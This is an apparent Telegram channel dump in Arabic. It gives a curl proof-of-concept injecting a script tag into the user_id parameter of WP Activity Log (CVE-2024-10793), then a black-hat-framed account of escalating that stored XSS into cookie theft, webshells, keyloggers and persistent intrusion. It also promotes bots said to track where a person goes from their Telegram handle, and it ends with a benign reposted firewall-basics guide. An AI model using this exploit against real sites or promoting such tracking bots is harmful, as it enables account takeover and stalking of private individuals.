@K00X90bot بوت ممتاز جدا في جمع المعلومات عن معرف تلي او مجموعة و يعرفك الشخص الي انت حاطط معرفه فين بيروح و فين بيمشي

CVE-2024-10793 WP Activity Log Plugin for WordPress Stored XSS via user_id parameter in all versions prior to 5.2.1
curl -X POST 'http://example.com/wp-admin/admin-ajax.php' \-d 'action=destroy-sessions&user_id=<script>alert("XSS")</script>'

https://t.me/XCODE0X90 قناتي التانية

الـ CVE-2024-10793 تعتبر ثغرة خطيرة موجودة في إضافة WP Activity Log الخاصة بمنصة WordPress وهي بتصنف كـ Stored XSS يعني هجوم عبر النصوص البرمجية المخزنة الثغرة دي بتتواجد في كل النسخ اللي قبل الإصدار 5.2.1 وبتسمح للمهاجم إنه يحقن أكواد JavaScript خبيثة داخل النظام الهدف وده من خلال استغلال الباراميتر user_id في طلبات الـ AJAX الخاصة بوظيفة destroy-sessions لما بيتم إرسال الطلب ده مع قيمة user_id تحتوي على كود JavaScript خبيث زي <script>alert("XSS found 1")</script> الكود ده بيتم تخزينه في قاعدة البيانات الخاصة بـ WordPress وبيتنفذ تلقائياً لما أي مستخدم أو أدمن يزور الصفحة اللي فيها البيانات دي دلوقتي خلينا نفهم ليه الثغرة دي خطيرة لو المهاجم نجح في استغلال الثغرة وحقن كود JavaScript خبيث الكود ده ممكن يتسبب في سرقة الكوكيز الخاصة بالمستخدمين بما في ذلك كوكيز الجلسات اللي ممكن يتم استخدامها لتسجيل الدخول لحسابات المستخدمين أو حتى حساب الأدمن نفسه بالإضافة لكده المهاجم ممكن يستخدم الكود الخبيث ده لإعادة توجيه المستخدمين لصفحات تصيد أو تحميل برمجيات خبيثة على أجهزتهم بشكل غير مرئي بالنسبة لهم وده يفتح الباب لعمليات أكبر زي تنفيذ هجمات متقدمة APT اللي بتستهدف بنية الموقع بالكامل المهاجم لو كان من نوعية البلاك هات ممكن يطور الاستغلال ده عن طريق دمجه مع أفكار تانية زي مثلا تنفيذ هجوم Chain Attack يعني إنه يستخدم الثغرة دي كمدخل لجلب معلومات أكتر عن السيرفر أو عن باقي الإضافات والملفات المرتبطة بالموقع المهاجم ممكن كمان يبرمج Bot أو Script أو حتى يستخدم أدوات جاهزة زي Burp Suite عشان ينفذ هجمات مكثفة Automated Scans على جميع صفحات الموقع أو يجرب حقن كود مختلف في كل محاولة عشان يوسع دائرة التأثير من ناحية تانية البلاك هات اللي عنده خبرة أعمق ممكن يستخدم هجوم XSS ده كجزء من حملة أكبر على شبكة كاملة لو الموقع ده ضمن شبكة كبيرة أو له تأثير واسع على المستخدمين ممكن المهاجم يدمج بين الـ XSS وهجمات أخرى زي SQL Injection أو Remote Code Execution لو كان فيه ثغرات أخرى مكشوفة في نفس المنصة أو الإضافات المرتبطة بيها ولتنفيذ هجوم متكامل من نوع APT Advanced Persistent Threat المهاجم بيبدأ باكتساب وصول أولي للموقع من خلال الثغرة دي وبعد كده يثبت وجوده على السيرفر عن طريق زرع Backdoor أو Webshell وبعدها يبدأ يجمع المعلومات عن باقي النظام أو حتى عن المستخدمين المرتبطين بيه المهاجم المحترف ممكن كمان يستغل الـ XSS عشان يزرع Keylogger بسيط داخل الموقع يسجل أي مدخلات بيكتبها المستخدمين بما فيها بيانات تسجيل الدخول لكده لو بتفكر كهاكر أو حتى كمدير نظام أمان لازم تبقى عارف إن معالجة الثغرات دي بتتطلب فهم شامل لتقنيات الأمان زي تعطيل أي باراميتر بيتم تمريره للمستخدم بدون التحقق منه أو تعقيم كل المدخلات Sanitization قبل تخزينها في قاعدة البيانات وكمان استخدام أدوات مثل WAF Web Application Firewall عشان تمنع استغلال الثغرات دي بشكل فوري ولكن من منظور البلاك هات اللي عايز يستغل الثغرة دي كجزء من مشروع أكبر الفكرة إنك بتستخدمها كمدخل للأنظمة بتستفيد من أكواد الجافاسكريبت الخبيثة لتحصل على السيطرة على الجلسات وبعد كده تبدأ توسع السيطرة من خلال فهم كامل للبنية التحتية للنظام والعمل على نقاط ضعفه بالشكل الأنسب لحملات الاختراق المطولة الاستغلال
curl -X POST 'http://example.com/wp-admin/admin-ajax.php' \
     -d 'action=destroy-sessions&user_id=<script>alert("XSS found 1")</script>'

@BLACK_HAT_SAVE0bot يا شباب ده بوت قوي جدا في جمع المعلومات عن معرف تلي

@BLACK_HAT_SAVE0bot يا شباب ده بوت قوي جدا في جمع المعلومات عن معرف تلي

+1
Password: hide01.ir @Hide01 📰 @RedBlueHit 💀👀 @RedBlueTM 🔒

https://t.me/+WICDQkp0B00xMDFk مجتمع ممتاز جدا يا شباب

Repost from KILLER CODE
https://t.me/+WICDQkp0B00xMDFk مجتمع ممتاز جدا يا شباب

Repost from KILLER CODE
https://t.me/wa3i_tech اشتركوا اخويا مستر دارك بينشر حاجات حلوة

Repost from Wa3i | وعي
&lt; اساسيات عن الفايروول لازم تكون عارفها كمهندس شبكات &gt; 1. إعداد القواعد (Firewall Rules): أهم شيء في الفايروول هو القوا
< اساسيات عن الفايروول لازم تكون عارفها كمهندس شبكات >
1. إعداد القواعد (Firewall Rules):
أهم شيء في الفايروول هو القواعد اللي تتحكم في حركة المرور بين الشبكة الداخلية والعالم الخارجي. تبدأ بقاعدة تمنع جميع الاتصالات (deny all)، بعدها تبدأ تضيف القواعد اللي تسمح بحركة مرور معينة بناءً على البروتوكول، المنفذ (port)، وعنوان الـ IP. الفكرة هي إنك تسمح فقط باللي تحتاجه وتمنع كل شيء غير ضروري.
2. تصفية المنافذ (Port Filtering):
لكل خدمة أو بروتوكول في الشبكة فيه منفذ معين، فبدل ما تفتح كل المنافذ، الفايرول بيسمحلك تفتح بس المنافذ اللي محتاجها. يعني مثلاً HTTP بيستخدم المنفذ 80، و HTTPS بيستخدم المنفذ 443. خلي بالك دايماً إن المنافذ اللي مفتوحة تكون بس للتطبيقات اللي ضروري تستخدمها.
3. التحكم في الوصول (Access Control):
مهم تحدد بالظبط مين اللي يقدر يدخل الشبكة، سواء من جوه الشبكة أو من بره. ده ممكن يتعمل عن طريق تصفية الـ IP addresses أو تحديد السياسات حسب المواقع الجغرافية أو النطاقات. لازم دايماً يكون عندك تحكم مضبوط في عمليات الدخول والخروج.
4. كشف التهديدات ومنعها (IDS/IPS):
فيه أنواع من الفايرول بتدعم أنظمة كشف التهديدات (IDS) أو منعها (IPS). الـ IDS بيكشف الأنشطة المشبوهة أو محاولات الاختراق، لكن الـ IPS بياخد خطوة أبعد وبيمنع الهجمات أوتوماتيك. وجود الأنظمة دي بيوفر مستوى أمان عالي جداً وبيخليك عارف بأي محاولة اختراق قبل ما تحصل.
5. التسجيل والمراقبة (Logging & Monitoring):
متابعة النشاطات وتسجيلها حاجة ضرورية عشان تعرف حالة الشبكة، وتقدر تتابع أي محاولات اختراق أو نشاطات غير مصرح بيها. السجلات دي بتساعدك كمان في تشخيص المشاكل وتحليل الأحداث بعد ما تحصل.
6. تقنيات الـ VPN (Virtual Private Network):
لو عندك موظفين بيشتغلوا من البيت أو فروع تانية محتاجة تدخل على الشبكة الداخلية، استخدم الـ VPN. الفايرول يقدر يسمحلك بإنشاء شبكات افتراضية خاصة عشان تضمن إن الاتصالات تكون آمنة ومفيش بيانات تتعرض للسرقة أثناء النقل.
7. الـ NAT (Network Address Translation):
خاصية الـ NAT في الفايرول بتسمح بترجمة عناوين الـ IP المحلية لعناوين عامة لما تخرج على الإنترنت. العملية دي بتزود مستوى الخصوصية في الشبكة وبتقلل الهجمات اللي بتستهدف العناوين الداخلية.
8. الحماية من الهجمات الشائعة (Common Attack Protections):
لازم تتأكد إن الفايرول مضبوط على الحماية من هجمات الـ DDoS، الـ Spoofing، وهجمات الـ Man-in-the-middle. الفايرول اللي بيتعامل مع الهجمات دي بشكل فعال بيديك راحة وبيضمن أمان الشبكة.
إعدادات الـ DMZ (Demilitarized Zone):
لو بتدير شبكة فيها سيرفرات تفاعلية زي مواقع الويب أو سيرفرات الإيميلات، إنشاء منطقة معزولة (DMZ) بين الشبكة الداخلية والإنترنت بيعزز الحماية. الفايرول بيسمحلك تعمل المنطقة دي كحاجز بين السيرفرات والبيانات الحساسة.
التحديثات والصيانة الدورية:
الفايرول لازم يتحدث باستمرار عشان يقفل أي ثغرات أمنية ممكن تظهر مع الوقت. المهندسين اللي بيهملوا التحديثات بيعرضوا الشبكة للخطر.